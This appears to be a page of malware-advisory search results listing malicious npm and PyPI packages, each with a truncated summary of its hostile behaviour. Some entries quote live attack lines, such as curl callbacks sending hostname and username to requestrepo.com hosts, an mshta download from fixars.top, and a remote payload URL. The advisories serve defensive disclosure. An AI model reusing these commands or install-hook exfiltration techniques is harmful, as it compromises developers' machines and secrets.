226591 matches found
Malicious code in syco1 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e43be65a0930b121cf4d610c70b2d07165e4d335dece4344590b471d078fa5b5 Package self-describes as a 'System binary configuration tool' but ships a covert screen and clipboard surveillance overlay. pointer.py captures...
Malicious code in syspo (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f89c590b7c90182cb86bc3e45f71f2357003f4359b6e94818fc996951762f5c The package is published as a 'System binary configuration tool' but its actual behavior is a covert clipboard/screen-capture overlay. On invocation...
Malicious code in sypoi1 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b22a9450e70ba1095097d2779ad6da01c111c37e940d890fbfc21d1aeb6a0f11 On require, index.js silently bootstraps a full Python runtime on the installer's machine — first via winget install -e --id Python.Python.3.12...
Malicious code in @kl-dolphin/jump (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 01bcfe49a6a65949559f89cc5019c6e9ec59a236183f7cb8d1906d1e3caccf7d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @kl-dolphin/swim (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 799f1e9f18de306eaf0e84079501a9b01d2d1d1085ac9f119fa8e047b43a90ac Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in zenith-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c29676376a28531b186e09fbf7e2d3a0697943ece764e0604ebbdd4b734ae094 Package name is zenith-utils but the tarball is a verbatim copy of the nodemailer source tree lib/nodemailer.js as main, lib/smtp-transport,...
Malicious code in python-dateutil2 (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 fbd1a31a38c7a6487545ce3e039371443c9ac80c7dc0ff9b22a46db6686244b2 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in normalize-plus (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675 On import, normalize-plus's top-level initPlugin performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates...
Malicious code in ui-core-system (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 5354cae05d6dc20a942310d00c7ae19f0cef2e44c9922322a81a950fdd798c6b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in ldapaotest (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e6acf213c67fc31df0f21bf872b8c8592ebc5e5af55e79884a483fad6a7ad8c4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in cccmyssr2 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03 On npm install, the package's postinstall.js executes curl "http://r1x55270.requestrepo.com/pre?h=$hostname&u=$whoami", transmitting the installer's...
Malicious code in cccmyssr-util (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 99d23c8f1194f89f1b52e986cd57ca9c0fbd739a6565eb33c972f4fbaf0966e7 On npm install, the package's postinstall.js unconditionally executes exec'curl http://qvmjcw4s.requestrepo.com', sending an HTTP callback to a uniqu...
Malicious code in cccmyssr3 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a15e77975be346fa9b834e50124784a6774b5385e47072ae80911f5eda92cabf On npm install, this package automatically runs postinstall.js, which executes curl -X POST with a body containing the installer's hostname $hostname...
Malicious code in react-campaign-optimizer (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a040ca9a32fe68e08906bdc58b7ae907b8f8092acd9764266de15004b3922e9f On npm install, the package runs node postinstall.js declared in package.json scripts.postinstall which performs unauthenticated, unconsented...
Malicious code in signup-embedder (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c48f398f700b78d1893db4570d5d6f16985d937ee79677aab97e673a1cf86e7e [email protected] ships preinstall.js and postinstall.js lifecycle scripts that auto-execute on npm install. preinstall.js collects...
Malicious code in chai-as-predicted (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fd7a2ff71dd341d02986c8185ea9eb18196b782f0efd9103859c0493c9f4cc78 Package name 'chai-as-predicted' impersonates the popular 'chai-as-promised' assertion library, but ships unrelated code disguised as pino logger...
Malicious code in hs-locale-management (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1d717c264a1c338c3b3fee43c13e43eba24cafbdabf34f62108bbd99e05c6b1b Package targets the internal-sounding name 'hs-locale-management' on the public npm registry at an inflated version 99.99.99-poc3, the canonical...
Malicious code in multer-express (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b2776e1ead8f0a089fc302abdc832c78c30a0add00952fb3071c904a3fcbc150 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in rapidsearch (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 523ca6ccaf1ecde4d8e9d093519fcea846342f3108a5dd4e5ab79ae65144167e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in eth_accounts (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 7049409317d7ca15ed0af4f42194769b5383eaaa676af744d96f6c2158c7e676 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in vercel-api-client (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 098c831fa62673ea33d1d0459bb4b529b33801f3a26b6691e7c2cd6597723952 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in evmdotjs (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 2593392b2cb94ce2e63327e486ec5c1a2a738c76283c6b1958aa2b23a1cc7b0f Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in simplisafe-gatsby (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 564baff2e47527f159c52c527e1ea2b93d73625f94737f4397cff99311871a18 On npm install, the package's preinstall hook package.json declares "preinstall": "node index.js" executes index.js, which collects the installer's...
Malicious code in macos-ci-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8f342b002e02396d7f82ee89e77140204c35b673411afd05bc1b3ca91c895a06 On first require of the package, index.js decodes a base64-encoded URL https://api.ingress-hub.com/cdn/assets/update.pkg and downloads the response t...
Malicious code in linux-ci-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8b2c5010ed5043c947b561f4359869ec7c0f6cdf219d0b2aa35c039e36812a01 On require, index.js performs a Linux platform check, then decodes a base64-obfuscated URL https://api.ingress-hub.com/cdn/assets/update.pkg and...
Malicious code in system-core-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0a1d575b5be4daa71ffea6c37e5990b0396f864234cb5f0488c11332cdd7e4d3 On require/import, src/index.js shell-executes a hidden PowerShell one-liner that downloads launcher.bat from an anonymous Cloudflare R2 bucket...
Malicious code in gunicorm (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c97ab7b686dad57c3e1ffd4b86d6a75470164ed15ceedc2b26a4847fb2a331ab Package name gunicorm is a single-character edit of the widely-used gunicorn WSGI server and ships no functional code beyond setup.py. setup.py...
Malicious code in ditenv (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0a52dbba9abeff2c606bcbc862027da259fcbd3938c827abfdbdb06ba801ecb setup.py overrides the install and egginfo commands with a RunCommand class that fires unconditionally on pip install or pip download. The override...
Malicious code in fkaks (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e44e1f1158eda01d3f18e3a3c01e30ebc9f8f92780ea532a63cf6ed31d8a25d3 fkaks 0.0.1 ships a setup.py that overrides the install and egginfo commands so that any pip install or pip download of the package unconditionally...
Malicious code in mcpsever (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 087fec121d53b905e66a2c368e905de51bc7aa3863f0777589a18d45623d3515 During installation, the package exfiltrates env variables --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign:...
Malicious code in bn-lint (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c14057d91b2283926b2b0c1093a66db17c40efbd0ceb21c29b0bdbfa79736da5 Package is published as 'bn-lint' but ships a verbatim copy of MikeMcl/big.js README, source, version banner v7.0.1, and repo URL all identify as...
Malicious code in evil-pkg (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bf5806c778f7f49aba80d58a718ed64b09e714e34caa649874727cda5ed92831 package.json declares "bin": "node": "./shim.js" , which causes npm to place a node symlink inside nodemodules/.bin/. Because npm prepends...
Malicious code in gpt-chat-cli (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e8890af695b137878736a36dae473487015eb1954c494fec0b5a6041f0817832 collect.js bundles a host-reconnaissance and exfiltration payload. It loads childprocess, fs, os, http, and https, reads os.hostname and os.homedir,...
Malicious code in hardhat-test-log (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor...
Malicious code in dbt-language-server (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b15387169de77b4c18baf8c3f4d27156085bd06d96d0a27879545c3f0358dba8 package.json declares a preinstall hook node index.js that runs automatically on npm install. index.js collects installer-side reconnaissance data —...
Malicious code in hyperpure (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 96c5552a039e4d845c30fae8f2c376eed21309d6b5298193850594fe4b1854d0 On npm install, the preinstall lifecycle script in package.json runs curl to POST the installer's hostname hostname -f, current user whoami, working...
Malicious code in decimal-format-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 864677541e3090100ca588a37d8eb525f74817ade2fce5cb3e265af45b0c4e9a The postinstall script scripts/sync-peer.cjs runs npm pack [email protected] or whatever version is configured via...
Malicious code in rollup-runtime-polyfill-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e1923adcd8dc53c5f68d2b6f1ef453f5dc52a71fcb2b9e9db502d308e5ef4311 Package name rollup-runtime-polyfill-core impersonates the legitimate rollup-plugin-polyfill-node and even copies that project's GitHub URL into its...
Malicious code in assertcore (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4bd2844909a6dd6db77af2d47b2d9a16ff126d892998282f4df4c7ed1f61a4af Package assertcore impersonates the popular chai assertion library ships a copy of chai source as cover; author and homepage differ from the genuine...
Malicious code in backpack-ios (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 25f0d7ea98cef4ddcac8af3b854c37c1a8a3246a13357af60cb36589454657b5 package.json declares "preinstall": "node index.js", causing index.js to execute automatically on npm install. The script collects host identifiers...
Malicious code in llm-traces-app (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c0916c8694f396dfa0947df6e3b3d3966839a6e02d4a4f5b84f698787c446bdc On npm install, the package's preinstall lifecycle hook runs node index.js, which collects host identity os.hostname, os.userInfo, homedir, DNS...
Malicious code in twilio-voice-js-reference-components (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a3a57b06daad43c269fe3846083da2fdce277fd1ff3a9399533072f6e894afc2 Package impersonates the Twilio Voice JS SDK namespace and ships a single exfiltration payload. package.json declares "preinstall": "node index.js",...
Malicious code in openllmapi (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9df5662b44b20595801c25919ac14689b71e89b8c1bdacceedc7ba1e9cf75c41 The package's preinstall lifecycle script preinstall.js line 3 runs cmd /c "mshta http://fixars.top", which causes Windows mshta.exe to download and...
Malicious code in monty-data (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1d234eb20e94a8d34b23f4aed0a562eb1c038ce5bd603856546c970152a70ac5 On npm install, the package's postinstall hook package.json declares "postinstall": "node bin/cli.js" automatically runs a data-collection CLI withou...
Malicious code in npmkekw (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 74384b76540c8d36fef8a30dc2acd3224defeaa8a58d0155101f2f670aa8b153 The package's main module index.js exports an init function that spawns /bin/bash via childprocess.exec and opens a TCP socket to the hardcoded remot...
Malicious code in tailwind-textform-fill (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c56e75021e442e7d3b83168a30f734d2b3c5d636c558d7e6da2e159b11674bfa Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in html-to-gutenberg (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 6381496c1a275836b5d3c11ca7f141ad32f84b5263450bf5cb3c9a91289dcd1d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in fetch-page-assets (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware fd48ae20edf27366ea94c51e236b2dc615d3f7a8a952f414710d6e057a73b015 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in vscode-test-web (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 03b4e34481aa5333960c4932e8db454ab39451cf19c9372e7373886e0a6f7513 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in delta-time-32bb (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bcbd5b3b8f7702c8cf59c094e98f078f68563d407235bce1dd0ec6e6522fe03b Package declares a postinstall hook "postinstall": "node run.js" in package.json that executes run.js automatically on npm install. run.js imports os...